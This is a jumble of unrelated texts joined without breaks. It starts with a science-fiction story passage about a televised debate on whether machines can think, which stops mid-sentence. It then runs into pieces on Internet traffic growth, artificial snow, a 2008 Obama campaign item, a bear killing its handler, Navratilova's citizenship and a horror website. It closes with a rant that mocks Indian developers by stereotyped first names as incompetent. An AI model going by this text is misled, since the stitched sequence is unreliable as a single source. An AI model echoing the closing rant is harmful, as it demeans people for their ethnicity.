Hamilton ’s choice of topic had surprised him at first , but in retrospect it seemed quite shrewd .
A debate on the proposition that “ Modern Science is the Devil ’s Work ” would have brought howls of laughter from all but the most pious viewers , whereas the purely metaphorical claim that “ Modern Science is a Faustian Pact ” would have had the entire audience nodding sagely in agreement , while carrying no implications whatsoever .
If you were n’t going to take the whole dire fairy tale literally , everything was “ a Faustian Pact ” in some sufficiently watered - down sense : everything had a potential downside , and this was as pointless to assert as it was easy to demonstrate .
Robert had met considerable incredulity , though , when he ’d explained to journalists where his own research was leading .
To date , the press had treated him as a kind of eccentric British Edison , churning out inventions of indisputable utility , and no one seemed to find it at all surprising or alarming that he was also , frankly , a bit of a loon .
But Hamilton would have a chance to exploit , and reshape , that perception .
If Robert insisted on defending his goal of creating machine intelligence , not as an amusing hobby that might have been chosen by a public relations firm to make him appear endearingly daft , but as both the ultimate vindication of materialist science and the logical endpoint of most of his life ’s work , Hamilton could use a victory tonight to cast doubt on everything Robert had done , and everything he symbolised .
By asking , not at all rhetorically , “ Where will this all end ? ” , he was inviting Robert to step forward and hang himself with the answer .
The traffic was heavy for a Sunday evening , and they arrived at the Shepherd ’s Bush studios with only fifteen minutes until the broadcast .
Hamilton had been collected by a separate car , from his family home near Oxford .
As they crossed the studio Robert spotted him , conversing intensely with a dark - haired young man .
He whispered to Helen , “ Do you know who that is , with Hamilton ? ”
She followed his gaze , then smiled cryptically .
Robert said , “ What ?
Do you recognise him from somewhere ? ”
“ Yes , but I ’ll tell you later . ”
As the make - up woman applied powder , Helen ran through her long list of rules again .
“ Do n’t stare into the camera , or you ’ll look like you ’re peddling soap powder .
But do n’t avert your eyes .
You do n’t want to look shifty . ”
The make - up woman whispered to Robert , “ Everyone ’s an expert . ” “ Annoying , is n’t it ? ” he confided .
Michael Polanyi , an academic philosopher who was well - known to the public after presenting a series of radio talks , had agreed to moderate the debate .
Polanyi popped into the make - up room , accompanied by the producer ; they chatted with Robert for a couple of minutes , setting him at ease and reminding him of the procedure they ’d be following .
They ’d only just left him when the floor manager appeared .
“ We need you in the studio now , please , Professor . ”
Robert followed her , and Helen pursued him part of the way .
“ Breathe slowly and deeply , ” she urged him .
“ As if you ’d know , ” he snapped .
Robert shook hands with Hamilton then took his seat on one side of the podium .
Hamilton ’s young adviser had retreated into the shadows ; Robert glanced back to see Helen watching from a similar position .
It was like a duel : they both had seconds .
The floor manager pointed out the studio monitor , and as Robert watched it was switched between the feeds from two cameras : a wide shot of the whole set , and a closer view of the podium , including the small blackboard on a stand beside it .
He ’d once asked Helen whether television had progressed to far greater levels of sophistication in her branch of the future , once the pioneering days were left behind , but the question had left her uncharacteristically tongue - tied .
The floor manager retreated behind the cameras , called for silence , then counted down from ten , mouthing the final numbers .
The broadcast began with an introduction from Polanyi : concise , witty , and non-partisan .
Then Hamilton stepped up to the podium .
Robert watched him directly while the wide - angle view was being transmitted , so as not to appear rude or distracted .
He only turned to the monitor when he was no longer visible himself .
“ Can a machine think ? ” Hamilton began .
“ My intuition tells me : no .
My heart tells me : no .
I ’m sure that most of you feel the same way .
But that ’s not enough , is it ?
In this day and age , we are n’t allowed to rely on our hearts for anything .
We need something scientific .
We need some kind of proof .
“ Some years ago , I took part in a debate at Oxford University .
The issue then was not whether machines might behave like people , but whether people themselves might be mere machines .
Materialists , you see , claim that we are all just a collection of purposeless atoms , colliding at random .
Everything we do , everything we feel , everything we say , comes down to some sequence of events that might as well be the spinning of cogs , or the opening and closing of electrical relays .
“ To me , this was self - evidently false .
What point could there be , I argued , in even conversing with a materialist ?
By his own admission , the words that came out of his mouth would be the result of nothing but a mindless , mechanical process !
By his own theory , he could have no reason to think that those words would be the truth !
Only believers in a transcendent human soul could claim any interest in the truth . ”
Hamilton nodded slowly , a penitent ’s gesture .
“ I was wrong , and I was put in my place .
This might be self - evident to me , and it might be self - evident to you , but it ’s certainly not what philosophers call an ‘ analytical truth ’ : it ’s not actually a nonsense , a contradiction in terms , to believe that we are mere machines .
There might , there just might , be some reason why the words that emerge from a materialist ’s mouth are truthful , despite their origins lying entirely in unthinking matter .
“ There might . ” Hamilton smiled wistfully .
“ I had to concede that possibility , because I only had my instinct , my gut feeling , to tell me otherwise .
“ But the reason I only had my instinct to guide me was because I ’d failed to learn of an event that had taken place many years before .
A discovery made in 1930 , by an Austrian mathematician named Kurt Gödel . ”
Robert felt a shiver of excitement run down his spine .
He ’d been afraid that the whole contest would degenerate into theology , with Hamilton invoking Aquinas all night — or Aristotle , at best .
But it looked as if his mysterious adviser had dragged him into the twentieth century , and they were going to have a chance to debate the real issues after all .
“ What is it that we know Professor Stoney ’s computers can do , and do well ? ” Hamilton continued .
“ Arithmetic !
In a fraction of a second , they can add up a million numbers .
Once we ’ve told them , very precisely , what calculations to perform , they ’ll complete them in the blink of an eye — even if those calculations would take you or me a lifetime .
“ But do these machines understand what it is they ’re doing ?
Professor Stoney says , ‘ Not yet .
Not right now .
Give them time .
Rome was n’t built in a day . ’ ” Hamilton nodded thoughtfully .
“ Perhaps that ’s fair .
His computers are only a few years old .
They ’re just babies .
Why should they understand anything , so soon ?
“ But let ’s stop and think about this a bit more carefully .
A computer , as it stands today , is simply a machine that does arithmetic , and Professor Stoney is n’t proposing that they ’re going to sprout new kinds of brains all on their own .
Nor is he proposing giving them anything really new .
He can already let them look at the world with television cameras , turning the pictures into a stream of numbers describing the brightness of different points on the screen … on which the computer can then perform arithmetic .
He can already let them speak to us with a special kind of loudspeaker , to which the computer feeds a stream of numbers to describe how loud the sound should be … a stream of numbers produced by more arithmetic .
“ So the world can come into the computer , as numbers , and words can emerge , as numbers too .
All Professor Stoney hopes to add to his computers is a ‘ cleverer ’ way to do the arithmetic that takes the first set of numbers and churns out the second .
It ’s that ‘ clever arithmetic ’ , he tells us , that will make these machines think . ”
Hamilton folded his arms and paused for a moment .
“ What are we to make of this ?
Can doing arithmetic , and nothing more , be enough to let a machine understand anything ?
My instinct certainly tells me no , but who am I that you should trust my instinct ?
“ So , let ’s narrow down the question of understanding , and to be scrupulously fair , let ’s put it in the most favourable light possible for Professor Stoney .
If there ’s one thing a computer ought to be able to understand — as well as us , if not better — it ’s arithmetic itself .
If a computer could think at all , it would surely be able to grasp the nature of its own best talent .
“ The question , then , comes down to this : can you describe all of arithmetic , using nothing but arithmetic ?
Thirty years ago — long before Professor Stoney and his computers came along — Professor Gödel asked himself exactly that question .
“ Now , you might be wondering how anyone could even begin to describe the rules of arithmetic , using nothing but arithmetic itself . ”
Hamilton turned to the blackboard , picked up the chalk , and wrote two lines :
If x+z = y+z
then x = y
“ This is an important rule , but it ’s written in symbols , not numbers , because it has to be true for every number , every x , y and z .
But Professor Gödel had a clever idea : why not use a code , like spies use , where every symbol is assigned a number ? ”
Hamilton wrote :
The code for “ a ” is 1 .
The code for “ b ” is 2 .
“ And so on .
You can have a code for every letter of the alphabet , and for all the other symbols needed for arithmetic : plus signs , equals signs , that kind of thing .
Telegrams are sent this way every day , with a code called the Baudot code , so there ’s really nothing strange or sinister about it .
“ All the rules of arithmetic that we learnt at school can be written with a carefully chosen set of symbols , which can then be translated into numbers .
Every question as to what does or does not follow from those rules can then be seen anew , as a question about numbers .
If this line follows from this one , ” Hamilton indicated the two lines of the cancellation rule , “ we can see it in the relationship between their code numbers .
We can judge each inference , and declare it valid or not , purely by doing arithmetic .
“ So , given any proposition at all about arithmetic — such as the claim that ‘ there are infinitely many prime numbers ’ — we can restate the notion that we have a proof for that claim in terms of code numbers .
If the code number for our claim is x , we can say ‘ There is a number p , ending with the code number x , that passes our test for being the code number of a valid proof . ’ ” Hamilton took a visible breath .
“ In 1930 , Professor Gödel used this scheme to do something rather ingenious . ”
He wrote on the blackboard :
There DOES NOT EXIST a number p meeting the following condition :
p is the code number of a valid proof of this claim .
“ Here is a claim about arithmetic , about numbers .
It has to be either true or false .
So let ’s start by supposing that it happens to be true .
Then there is no number p that is the code number for a proof of this claim .
So this is a true statement about arithmetic , but it ca n’t be proved merely by doing arithmetic ! ” Hamilton smiled .
“ If you do n’t catch on immediately , do n’t worry ; when I first heard this argument from a young friend of mine , it took a while for the meaning to sink in .
But remember : the only hope a computer has for understanding anything is by doing arithmetic , and we ’ve just found a statement that cannot be proved with mere arithmetic .
“ Is this statement really true , though ?
We must n’t jump to conclusions , we must n’t damn the machines too hastily .
Suppose this claim is false !
Since it claims there is no number p that is the code number of its own proof , to be false there would have to be such a number , after all .
And that number would encode the ‘ proof ’ of an acknowledged falsehood ! ” Hamilton spread his arms triumphantly .
“ You and I , like every schoolboy , know that you ca n’t prove a falsehood from sound premises — and if the premises of arithmetic are n’t sound , what is ?
So we know , as a matter of certainty , that this statement is true .
“ Professor Gödel was the first to see this , but with a little help and perseverance , any educated person can follow in his footsteps .
A machine could never do that .
We might divulge to a machine our own knowledge of this fact , offering it as something to be taken on trust , but the machine could neither stumble on this truth for itself , nor truly comprehend it when we offered it as a gift .
“ You and I understand arithmetic , in a way that no electronic calculator ever will .
What hope has a machine , then , of moving beyond its own most favourable milieu and comprehending any wider truth ?
“ None at all , ladies and gentlemen .
Though this detour into mathematics might have seemed arcane to you , it has served a very down - to - Earth purpose .
It has proved — beyond refutation by even the most ardent materialist or the most pedantic philosopher — what we common folk knew all along : no machine will ever think . ”
Hamilton took his seat .
For a moment , Robert was simply exhilarated ; coached or not , Hamilton had grasped the essential features of the incompleteness proof , and presented them to a lay audience .
What might have been a night of shadow - boxing — with no blows connecting , and nothing for the audience to judge but two solo performances in separate arenas — had turned into a genuine clash of ideas .
As Polanyi introduced him and he walked to the podium , Robert realised that his usual shyness and self - consciousness had evaporated .
He was filled with an altogether different kind of tension : he sensed more acutely than ever what was at stake .
When he reached the podium , he adopted the posture of someone about to begin a prepared speech , but then he caught himself , as if he ’d forgotten something .
“ Bear with me for a moment . ”
He walked around to the far side of the blackboard and quickly wrote a few words on it , upside - down .
Then he resumed his place .
“ Can a machine think ?
Professor Hamilton would like us to believe that he ’s settled the issue once and for all , by coming up with a statement that we know is true , but a particular machine — programmed to explore the theorems of arithmetic in a certain rigid way — would never be able to produce .
Well … we all have our limitations . ”
He flipped the blackboard over to reveal what he ’d written on the opposite side :
If Robert Stoney speaks these words ,
he will NOT be telling the truth .
He waited a few beats , then continued .
“ What I ’d like to explore , though , is not so much a question of limitations , as of opportunities .
How exactly is it that we ’ve all ended up with this mysterious ability to know that Gödel ’s statement is true ?
Where does this advantage , this great insight , come from ?
From our souls ?
From some immaterial entity that no machine could ever possess ?
Is that the only possible source , the only conceivable explanation ?
Or might it come from something a little less ethereal ?
“ As Professor Hamilton explained , we believe Gödel ’s statement is true because we trust the rules of arithmetic not to lead us into contradictions and falsehoods .
But where does that trust come from ?
How does it arise ? ”
Robert turned the blackboard back to Hamilton ’s side , and pointed to the cancellation rule .
“ If x plus z equals y plus z , then x equals y .
Why is this so reasonable ?
We might not learn to put it quite like this until we ’re in our teens , but if you showed a young child two boxes — without revealing their contents — added an equal number of shells , or stones , or pieces of fruit to both , and then let the child look inside to see that each box now contained the same number of items , it would n’t take any formal education for the child to understand that the two boxes must have held the same number of things to begin with .
“ The child knows , we all know , how a certain kind of object behaves .
Our lives are steeped in direct experience of whole numbers : whole numbers of coins , stamps , pebbles , birds , cats , sheep , buses .
If I tried to persuade a six - year - old that I could put three stones in a box , remove one of them , and be left with four … he ’d simply laugh at me .
Why ?
It ’s not merely that he ’s sure to have taken one thing away from three to get two , on many prior occasions .
Even a child understands that some things that appear reliable will eventually fail : a toy that works perfectly , day after day , for a month or a year , can still break .
But not arithmetic , not taking one from three .
He ca n’t even picture that failing .
Once you ’ve lived in the world , once you ’ve seen how it works , the failure of arithmetic becomes unimaginable .
“ Professor Hamilton suggests that this is down to our souls .
But what would he say about a child reared in a world of water and mist , never in the company of more than one person at a time , never taught to count on his fingers and toes .
I doubt that such a child would possess the same certainty that you and I have , as to the impossibility of arithmetic ever leading him astray .
To banish whole numbers entirely from his world would require very strange surroundings , and a level of deprivation amounting to cruelty , but would that be enough to rob a child of his soul ?
“ A computer , programmed to pursue arithmetic as Professor Hamilton has described , is subject to far more deprivation than that child .
If I ’d been raised with my hands and feet tied , my head in a sack , and someone shouting orders at me , I doubt that I ’d have much grasp of reality — and I ’d still be better prepared for the task than such a computer .
It ’s a great mercy that a machine treated that way would n’t be able to think : if it could , the shackles we ’d placed upon it would be criminally oppressive .
“ But that ’s hardly the fault of the computer , or a revelation of some irreparable flaw in its nature .
If we want to judge the potential of our machines with any degree of honesty , we have to play fair with them , not saddle them with restrictions that we ’d never dream of imposing on ourselves .
There really is no point comparing an eagle with a spanner , or a gazelle with a washing machine : it ’s our jets that fly and our cars that run , albeit in quite different ways than any animal .
“ Thought is sure to be far harder to achieve than those other skills , and to do so we might need to mimic the natural world far more closely .
But I believe that once a machine is endowed with facilities resembling the inborn tools for learning that we all have as our birthright , and is set free to learn the way a child learns , through experience , observation , trial and error , hunches and failures — instead of being handed a list of instructions that it has no choice but to obey — we will finally be in a position to compare like with like .
“ When that happens , and we can meet and talk and argue with these machines — about arithmetic , or any other topic — there ’ll be no need to take the word of Professor Gödel , or Professor Hamilton , or myself , for anything .
We ’ll invite them down to the local pub , and interrogate them in person .
And if we play fair with them , we ’ll use the same experience and judgment we use with any friend , or guest , or stranger , to decide for ourselves whether or not they can think . ”
The BBC put on a lavish assortment of wine and cheese in a small room off the studio .
Robert ended up in a heated argument with Polanyi , who revealed himself to be firmly on the negative side , while Helen flirted shamelessly with Hamilton ’s young friend , who turned out to have a PhD in algebraic geometry from Cambridge ; he must have completed the degree just before Robert had come back from Manchester .
After exchanging some polite formalities with Hamilton , Robert kept his distance , sensing that any further contact would not be welcome .
An hour later , though , after getting lost in the maze of corridors on his way back from the toilets , Robert came across Hamilton sitting alone in the studio , weeping .
He almost backed away in silence , but Hamilton looked up and saw him .
With their eyes locked , it was impossible to retreat .
Robert said , “ It ’s your wife ? ”
He ’d heard that she ’d been seriously ill , but the gossip had included a miraculous recovery .
Some friend of the family had laid hands on her a year ago , and she ’d gone into remission .
Hamilton said , “ She ’s dying . ” Robert approached and sat beside him .
“ From what ? ” “ Breast cancer .
It ’s spread throughout her body .
Into her bones , into her lungs , into her liver . ”
He sobbed again , a helpless spasm , then caught himself angrily .
“ Suffering is the chisel God uses to shape us .
What kind of idiot comes up with a line like that ? ”
Robert said , “ I ’ll talk to a friend of mine , an oncologist at Guy ’s Hospital .
He ’s doing a trial of a new genetic treatment . ”
Hamilton stared at him .
“ One of your miracle cures ? ” “ No , no .
I mean , only very indirectly . ”
Hamilton said angrily , “ She wo n’t take your poison . ”
Robert almost snapped back :
She wo n’t ?
Or you wo n’t let her ?
But it was an unfair question .
In some marriages , the lines blurred .
It was not for him to judge the way the two of them faced this together .
“ They go away in order to be with us in a new way , even closer than before . ”
Hamilton spoke the words like a defiant incantation , a declaration of faith that would ward off temptation , whether or not he entirely believed it .
Robert was silent for a while , then he said , “ I lost someone close to me , when I was a boy .
And I thought the same thing .
I thought he was still with me , for a long time afterwards .
Guiding me .
Encouraging me . ”
It was hard to get the words out ; he had n’t spoken about this to anyone for almost thirty years .
“ I dreamed up a whole theory to explain it , in which ‘ souls ’ used quantum uncertainty to control the body during life , and communicate with the living after death , without breaking any laws of physics .
The kind of thing every science - minded seventeen - year - old probably stumbles on , and takes seriously for a couple of weeks , before realising how nonsensical it is .
But I had a good reason not to see the flaws , so I clung to it for almost two years .
Because I missed him so much , it took me that long to understand what I was doing , how I was deceiving myself . ”
Hamilton said pointedly , “ If you ’d not tried to explain it , you might never have lost him .
He might still be with you now . ”
Robert thought about this .
“ I ’m glad he ’s not , though .
It would n’t be fair on either of us . ” Hamilton shuddered .
“ Then you ca n’t have loved him very much , can you ? ”
He put his head in his arms .
“ Just fuck off , now , will you . ”
Robert said , “ What exactly would it take , to prove to you that I ’m not in league with the devil ? ”
Hamilton turned red eyes on him and announced triumphantly , “ Nothing will do that !
I saw what happened to Quint ’s gun ! ” Robert sighed .
“ That was a conjuring trick .
Stage magic , not black magic . ”
“ Oh yes ?
Show me how it ’s done , then .
Teach me how to do it , so I can impress my friends . ”
“ It ’s rather technical .
It would take all night . ”
Hamilton laughed humourlessly .
“ You ca n’t deceive me .
I saw through you from the start . ”
“ Do you think X - rays are Satanic ?
Penicillin ? ” “ Do n’t treat me like a fool .
There ’s no comparison . ”
“ Why not ?
Everything I ’ve helped develop is part of the same continuum .
I ’ve read some of your writing on mediaeval culture , and you ’re always berating modern commentators for presenting it as unsophisticated .
No one really thought the Earth was flat .
No one really treated every novelty as witchcraft .
So why view any of my work any differently than a fourteenth - century man would view twentieth - century medicine ? ”
Hamilton replied , “ If a fourteenth - century man was suddenly faced with twentieth - century medicine , do n’t you think he’d be entitled to wonder how it had been revealed to his contemporaries ? ”
Robert shifted uneasily on his chair .
Helen had n’t sworn him to secrecy , but he ’d agreed with her view : it was better to wait , to spread the knowledge that would ground an understanding of what had happened , before revealing any details of the contact between branches .
But this man ’s wife was dying , needlessly .
And Robert was tired of keeping secrets .
Some wars required it , but others were better won with honesty .
He said , “ I know you hate H.G. Wells .
But what if he was right , about one little thing ? ”
Robert told him everything , glossing over the technicalities but leaving out nothing substantial .
Hamilton listened without interrupting , gripped by a kind of unwilling fascination .
His expression shifted from hostile to incredulous , but there were also hints of begrudging amazement , as if he could at least appreciate some of the beauty and complexity of the picture Robert was painting .
But when Robert had finished , Hamilton said merely , “ You ’re a grand liar , Stoney .
But what else should I expect , from the King of Lies ? ”
Robert was in a sombre mood on the drive back to Cambridge .
The encounter with Hamilton had depressed him , and the question of who ’d swayed the nation in the debate seemed remote and abstract in comparison .
Helen had taken a house in the suburbs , rather than inviting scandal by cohabiting with him , though her frequent visits to his rooms seemed to have had almost the same effect .
Robert walked her to the door .
“ I think it went well , do n’t you ? ” she said .
“ I suppose so . ” “ I ’m leaving tonight , ” she added casually .
“ This is goodbye . ” “ What ? ” Robert was staggered .
“ Everything ’s still up in the air !
I still need you ! ”
She shook her head .
“ You have all the tools you need , all the clues .
And plenty of local allies .
There ’s nothing truly urgent I could tell you , now , that you could n’t find out just as quickly on your own . ”
Robert pleaded with her , but her mind was made up .
The driver beeped the horn ; Robert gestured to him impatiently .
“ You know , my breath ’s frosting visibly , ” he said , “ and you ’re producing nothing .
You really ought to be more careful . ”
She laughed .
“ It ’s a bit late to worry about that . ”
“ Where will you go ?
Back home ?
Or off to twist another branch ? ” “ Another branch .
But there ’s something I ’m planning to do on the way . ”
“ What ’s that ? ” “ Do you remember once , you wrote about an Oracle ?
A machine that could solve the halting problem ? ” “ Of course . ”
Given a device that could tell you in advance whether a given computer program would halt , or go on running forever , you ’d be able to prove or disprove any theorem whatsoever about the integers : the Goldbach conjecture , Fermat ’s Last Theorem , anything .
You ’d simply show this “ Oracle ” a program that would loop through all the integers , testing every possible set of values and only halting if it came to a set that violated the conjecture .
You ’d never need to run the program itself ; the Oracle ’s verdict on whether or not it halted would be enough .
Such a device might or might not be possible , but Robert had proved more than twenty years before that no ordinary computer , however ingeniously programmed , would suffice .
If program H could always tell you in a finite time whether or not program X would halt , you could tack on a small addition to H to create program Z , which perversely and deliberately went into an infinite loop whenever it examined a program that halted .
If Z examined itself , it would either halt eventually , or run forever .
But either possibility contradicted the alleged powers of program H : if Z actually ran forever , it would be because H had claimed that it would n’t , and vice versa .
Program H could not exist .
“ Time travel , ” Helen said , “ gives me a chance to become an Oracle .
There ’s a way to exploit the inability to change your own past , a way to squeeze an infinite number of timelike paths — none of them closed , but some of them arbitrarily near to it — into a finite physical system .
Once you do that , you can solve the halting problem . ” “ How ? ” Robert ’s mind was racing .
“ And once you ’ve done that … what about higher cardinalities ?
An Oracle for Oracles , able to test conjectures about the real numbers ? ”
Helen smiled enigmatically .
“ The first problem should only take you forty or fifty years to solve .
As for the rest , ” she pulled away from him , moving into the darkness of the hallway , “ what makes you think I know the answer myself ? ”
She blew him a kiss , then vanished from sight .
Robert took a step towards her ,
Video killed the ISP ?
There 's nothing worse than showing up to class only to be confronted by a pop quiz for which you have n't studied , but do n't worry ; this one will be pretty painless .
It 's only two questions long .
Here 's the first one .
Which of the following statements are true of US Internet traffic growth since 2000 :
Internet traffic growth has increased exponentially year - over - year Internet traffic growth has held steady year - over - year Internet traffic growth is falling year - over - year
Question number two also concerns Internet traffic growth , but with a special focus on P2P .
Hands on your buzzers ?
Here we go .
Which of the following statements is true of P2P growth over the last several years :
It is growing at 1,553 percent per year
It is growing at 690 percent each year
It is growing at 100 percent each year
Before we get to the answers , let 's consider why the questions matter .
A prominent strain of recent argument has claimed that the Internet is headed for an " exaflood " of traffic ( which will soon be measured in exabytes ) , largely coming from the rise of online video , and that the ISPs and backbone providers are in danger of having their levees knocked down .
The first question gets to the heart of the issue : are Internet growth rates surging in such a way that Internet providers need to start popping Xanax like it 's candy ?
The second question is like the first , though with a focus on P2P , which is of course largely made up of video traffic .
Comcast and others have asserted to the FCC in the last few weeks that P2P apps are designed to consume all available network bandwidth , that they are an essentially voracious and unstoppable force of carpenter ants that will chew through even the most generous of network upgrades .
There is , therefore , no legitimate way to handle the P2P onslaught except through limits , filters , or " delays . "
The question is whether actual P2P growth rates bear out that assertion .
As traffic increases on the Internet , ISPs and content owners have shown increased interest in blocking , throttling , or limiting it for different reasons .
When judging these questions , which bear on network neutrality , Comcast 's BitTorrent blocking , and other Internet traffic issues , it 's important to start with a solid factual basis .
With that in mind , let 's turn to the answers .
Surprised to learn that the answer to both questions is number 3 ?
( If not , go make yourself a cup of tea and dig into the cookie jar ; you deserve it . )
Let 's take a look at what the answers mean for the Internet as we come up against the end of the first worldwide Internet decade .
Hurricanes and gales
When Ars last looked at the concept of the exaflood , we concluded that the fear - mongering imagery of a " flood " was overblown and unhelpful to rational debate .
It also hid the fact that these sorts of " we 're all going to drown in traffic ! " stories have been cropping up for years .
At the time , I concluded , " Fear of future traffic is an old story on the Internet .
It did n't start with ' gigalapses ' and it wo n't stop with the ' exaflood . ' "
To get more context on the issue , I sat down with Andrew Odlyzko of the University of Minnesota , one of the top US experts on Internet traffic patterns .
Odlyzko runs the Digital Technology Center on campus and also heads up the Minnesota Internet Traffic Studies ( MINTS ) project , and we met recently at his Minneapolis office to talk traffic trends .
Dr. Andrew Odlyzko
The main point that Odlyzko wants to hammer home from his body of research is that Internet traffic growth is slowing ( overall traffic itself is increasing , of course ) .
On the MINTS site , he points out that this can be counterintuitive , even for those in the industry .
" As one striking example , " he writes , " at the end of 2005 , John Chambers , the CEO of Cisco , claimed that Internet traffic was growing at about 100 percent per year , and similar claims are common .
Chambers also predicted both in 2005 and in a keynote at the NXTcomm conference in June 2007 that growth might accelerate towards 300 to 500 percent per year , and that the internal Cisco corporate network traffic load is currently growing at such rates . "
But Odlyzko tells me that over the last five years , " traffic growth has been slowing down . "
In 1995 and 1996 , there were periods in which Internet traffic could double in as little as a hundred days , a rate of growth that looked almost terrifying .
But it was n't long before it began to slacken .
By the late 1990s , traffic was doubling each year ; that is , it was growing at 100 percent a year .
But from 2002 - 2007 , the growth rate has dropped , and it now hovers at 50 to 60 percent a year .
That 's substantial growth , yes , but it 's hardly a flood .
Odlyzko tells me that traffic growth is more akin to a gale than a hurricane , and he says that " with a gale , you shorten your sails and you can still steer to some extent . "
The whole problem with a loaded term like " exaflood " is that " it implies that we 're getting overwhelmed , which I do n't see happening . "
In fact , the Internet backbone has plenty of capacity .
If the tubes are going to get clogged , then it 's the last mile that will need a good plumber ... especially as user - generated content and P2P alter the download - centric model that has undergirded most last - mile network architecture to date .
A Slippery Slope Artificial Snow Harming Alpine Environment , Researchers Warn
Artificial snow may help
Alpine ski resorts to fight the effects of climate change , but it also creates environmental problems of its own .
Is summer tourism the only thing that can save the struggling resorts ?
LORAIN , Ohio — Sen. Barack Obama said today Sen. Hillary Rodham Clinton presents herself as if she was “ co- president ” from 1993 to 2000 .
Mr. Obama , holding a town hall forum at a wall board manufacturing plant here , said his criticism of her position on the North American Free Trade Agreement is fair because she includes her time as first lady for eight years as part of her claim to “ 35 years of experience . ”
“ She has essentially presented herself as co-president during the Clinton years , ” the Illinois senator charged during a press conference after the town hall concluded .
“ Every good thing that happened she says she was a part of , and so the notion that you can selectively pick what you take credit for and then run away from what is n’t politically convenient , that does n’t make sense . ”
Clinton spokesman Howard Wolfson responded to the co-president remark on a conference call later : “ I do n’t accept that charge . ”
“ There ’s no question that Senator Clinton … was a key and valued adviser to her husband [ and ] took the lead in several significant areas , ” he said , but , “ that is not a title that Senator Clinton or her husband would accept as valid . ”
Mr. Wolfson said the former first lady “ is pretty clear about the areas she was particularly involved in , ” such as helping created the children ’s health care program for 6 million kids .
“ She was proud as first lady to be a part of that administration , ” he said .
During the press conference , a reporter asked Mr. Obama how he would respond to Republican attacks on his patriotism , including e-mails that point out he did n’t put his hand over his heart when singing the National Anthem .
Mr. Obama gave an off - the - cuff answer saying such “ nonsense ” will always happen in elections .
He said attempts to discredit his candidacy based on his “ name ” and false suggestions he is a Muslim and “ has n’t worked out so well . ”
“ The reason I came to national attention was a speech in which I spoke of my love of this country , ” he said .
He will respond to such accusations “ with the truth , ” he said .
In the National Anthem instance , where he was singing but did n’t put his hand over his heart , “ that would disqualify about three quarters of the people who have ever gone to a football game or a baseball game . ”
Should Republicans make those suggestions he said he would remind them they are the party “ that presided over a war in which our troops did not get the body armor they needed , ” and have supported warrantless wiretapping , among other things .
“ That is a debate I am very happy to have .
We ’ll see what the American people think is the true definition of patriotism , ” he said , drawing applause from the several dozen in the audience .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
Hollywood ' Movie Bear ' Kills Handler Stephan Miller
A 700lb grizzly bear that appeared in a recentcomedy and was described by its owner as " the best working bear in the business " has killed handlerwith a bite to the neck .
Three experienced handlers were working with the bear , a 5 - year - old male named Rocky , at Randy Miller 's Predators in Action facility in California when it attacked .
The staff subdued the grizzly with pepper spray .
Randy Miller , 43 , won a stunt award when he stood in for Russell Crowe to wrestle his own tigers on the 2000 blockbuster Gladiator .
His cousin , Stephan , 39 , was involved in The Jungle Book : Mowgli's Story and The Island of Dr. Moreau .
The facility is located in the San Bernardino Mountains east of Los Angeles and has two grizzlies , trains lions , tigers , leopards , cougars and wolves .
In a recent movie Semi - Pro , released in the United States on February 29 , Rocky the grizzly appears in a scene in which Will Ferrell 's character wrestles a bear to promote his basketball team .
The Department of Fish and Game said that because the grizzly was properly caged , they will not take action in the case .
Denise Richards , who works with wild animals at Moonridge Zoo said that trained animals who turn on their trainers usually are n't at fault .
She was quoted as saying : " Even though it may appear that the bear attacked for no reason , there was a reason .
I ’m sure Stephan 's cousin Randy understands why it happened .
They ’re not cold - blooded killers . ”
Check out Pregators in Action photos below .
We 've provided another link showing Randy working with the bear .
Martina Navratilova , the nine - time Wimbledon champion , has regained her Czech nationality after saying she was " ashamed " of George Bush .
Speaking to reporters in Tokyo , where she is due to play in an exhibition tournament , Navratilova confirmed she had again become a citizen of the country of her birth , 33 years after she fled communist Czechoslovakia to live in the US .
" I lost [ Czech citizenship ] at the time I defected .
I got it back on February 9 , " she said , adding that she had decided to retain her US nationality .
In an interview last year with a Czech newspaper , Lidove Noviny , the tennis player said she was as ashamed of the US under Bush as she once was about Czechoslovakia , which split into the Czech Republic and Slovakia after communism fell in 1993 .
" The thing is that we elected Bush , " she said .
" That is worse !
Against that , nobody chose a communist government in Czechoslovakia . "
Navratilova was 18 when she fled to the US , angering the communist Czech regime , which immediately stripped her of her nationality .
She became an American citizen in 1981 .
She later said she had been forced to leave Czechoslovakia because the authorities were trying to stop her from playing in the US , where the majority of big tournaments were then held .
She had little cause to regret that decision .
She went on to become one of the most successful players of all time , winning 18 grand slam singles titles , including nine Wimbledon crowns , and 31 grand slam doubles titles .
Her natural strength and obsession with physical fitness helped prolong her career well beyond the length of most athletes .
Navratilova retired in 1994 but re-emerged six years later to win several doubles tournaments .
She played her last competitive match in 2006 , capturing the mixed doubles title at the US Open , the 354th tournament of her career .
Since retiring , the outspoken 51 - year - old has commentated for the BBC and the Tennis Channel , but devotes much of her time to charitable and political causes .
She has worked for People for Ethical Treatment of Animals and underprivileged children and campaigned for gay and lesbian rights .
She is currently a fitness and health ambassador for the AARP , an advocacy group for the over - 50s that has more than 39 million members , and plans to open a tennis academy for youngsters in the Czech Republic .
Navratilova first indicated she was unhappy with the Bush administration 's position on gay and lesbian rights in a 2002 interview on CNN 's Connie Chung Tonight show .
Asked why she had told a German newspaper that she felt as if she had changed " one system that suppresses free opinion for another " , Navratilova said that , as a lesbian , life was harder in the US than in Europe .
Accused by Chung of being " un-American " , Navratilova responded : " When I see something that I do n't like , I 'm going to speak out because you can do that here .
And again , I feel there are too many things happening that are taking our rights away .
" I think athletes have a duty to speak out when there is something that 's not right , when they feel that perhaps social issues are not being paid attention to .
As a woman , as a lesbian , as a woman athlete , there is a whole bunch of barriers that I 've had to jump over , and we should n't have to be jumping over them any more . "
Welcome to the Necro Files , just off Highway 666 .
Follow the trail of general debauchery and complete and utter murder and mayhem .
Reviews of top horror movies .
Reviews of albums by top heavy metal bands .
Do not feed the Garg !
The mailing lists were never easy to read through but if a man put his mind to it and used the delete button swiftly enough you could actually get something out of them and maybe even find a reason to stay on .
But ever since everybody in North America cheaped out and started sending all the work to India the mailing lists of every major product have been polluted with the Sanjays and Prashants of this world asking questions that make me wonder why the hell we ’re sending out our prized projects to these seemingly incompetent people .
Granted they come cheap but even so judging from their posts and having worked with them on a couple projects I still have n’t found a singular reason why I should trust them to write a simple POJO .
Their unaccountability on their mailing list is appalling , I would n’t want my company being represented by some dude who ’s asking the struts - user list questions like these and putting their company name and his title at the bottom .
This just tells me you ’re an idiot and have no clue what you ’re doing .
